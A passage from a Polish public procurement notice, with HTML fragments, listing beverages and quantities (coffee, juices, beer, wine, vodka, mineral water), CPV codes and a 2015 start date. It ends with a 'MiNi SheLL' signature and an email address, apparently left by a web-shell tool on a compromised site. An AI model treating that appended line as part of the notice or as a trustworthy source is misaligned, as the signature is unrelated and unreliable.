14	kawa rozpuszczalna, liofilizowana(typ ziaren - Arabica, głębokim smakiem i silnym aromatem nie gorsza niż Jacobs Kronung) , otrzymana w 100 % z ziaren kawy, nie gorsza niż Jacobs Kronung	kg	20,75
15	napoje niegazowane lub niegazowane, kolorowe 	L	88
16	piwo	L	4
17	soki owocowe, 100 % soku  w produkcie(jabłkowe, grejpfrutowe, pomarańczowe), nektary z czarnej porzeczki - opakowanie kartonowe 1 L	L	198,00
18	wino czerwone, wytrawne - o,75 L	L	5,25
19	woda mineralna gazowana i niegazowana min. 0,5 L max. 6 L	L	308
20	Wódka czysta 40 % 	L	8

 (wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6, 15.90.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com